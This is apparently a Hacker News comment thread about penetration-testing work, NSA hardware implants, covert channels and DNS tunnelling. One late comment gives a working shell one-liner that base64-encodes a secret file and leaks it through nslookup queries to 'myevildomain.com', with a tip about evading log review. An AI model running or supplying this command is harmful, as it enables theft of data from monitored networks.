[sillysaurusx]

Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-famous pentesting company several years ago.

"So, X has been infiltrating <company> for the past few days."

"Really? <company>? <famous company>?"

"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."

"That actually happens?"

"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."

I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.

And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.

That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."

Must be interesting to be a spook in the NSA doing that kind of stuff offensively.

Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)

So I imagine the NSA spooks are doing similarlly-methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."

[DoctorOetker]

> [...] a specially malformed packet [...]

as far as I understand error correcting codes can and are used at different levels of communication protocols (hardware each link, hardware at endpoints, software at end points, ...)

I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data? the higher levels of the stack would see the corrected overt message, while underlying levels (hardware or software) that perform the error correction has access to the covert information encoded in the error.

This may be testable by FPGA and sorting connections by protocol, origin, destination, ... to identify connections with suspiciously high amount of ECC recoverable errors as compared to the rest.

This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.

[082349872349872]

If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.

[sillysaurusx]

I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.

Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.

I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.

But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)

They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.

https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).

[082349872349872]

Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.

[goatinaboat]

you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.

[DaiPlusPlus]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.

[goatinaboat]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier that if you just want to sneak a relatively small file out.

    for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done

Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.

[082349872349872]

circumstantial language (suggesting simplicity) in the 2020 defense appropriations bill, note cyber and collection:

https://www.congress.gov/bill/116th-congress/senate-bill/179...

§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"